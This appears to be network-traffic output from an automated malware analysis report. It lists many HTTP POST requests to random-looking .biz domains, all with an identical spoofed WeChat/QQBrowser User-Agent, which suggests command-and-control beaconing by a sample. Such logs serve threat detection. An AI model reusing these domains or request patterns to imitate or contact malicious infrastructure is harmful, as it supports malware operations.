                      Source: global trafficHTTP traffic detected: POST /jsgrpxea HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /kvae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /eiatwbrknxj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /vuubmwkijd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /bbriddytwq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /yeeqryklqchag HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /svctwhlwhnodkjc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /srarrsentbxw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /yaj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ubnpo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /dddgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ndwuuvykmbmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ekicmdatg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xfffiesfse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /glmweuqq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /nb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ybnjtwgoi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /u HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /avkhmehufii HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /bsnsmn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /awlv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /bhirak HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /cckxgccommw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /lje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /aykeetjatrhfhv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /fddxbhb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /piudubsi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /twarfxyjhx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /hiumlgdcypdn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /eppbxqyetuy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /dsmegxny HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /yk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /cpdavm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /tjwoaphj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /tq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /nkklk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /tynixdppnmlq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /fxciie HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /kwdmltggrfrmu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /st HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /rfcbglebj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ugn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /jcpwgygctjgsvho HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /wwge HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ohxhiftljchuvp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /fp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /exuicwnpaqmh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /npuxmmvdoacshpp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /xxfg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /bhjwcsvylmqgrfwl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /kmkkfixobdivq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /fp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /wpngtwyaa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /aglvdwcnc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ijq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /arqdlqnxd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xfpfkqjakhgaed HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /enixguayej HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /olaxecwr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /hb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /rejcysylgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /luiqxxselqgi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /gsd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ikgnytocxhbn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
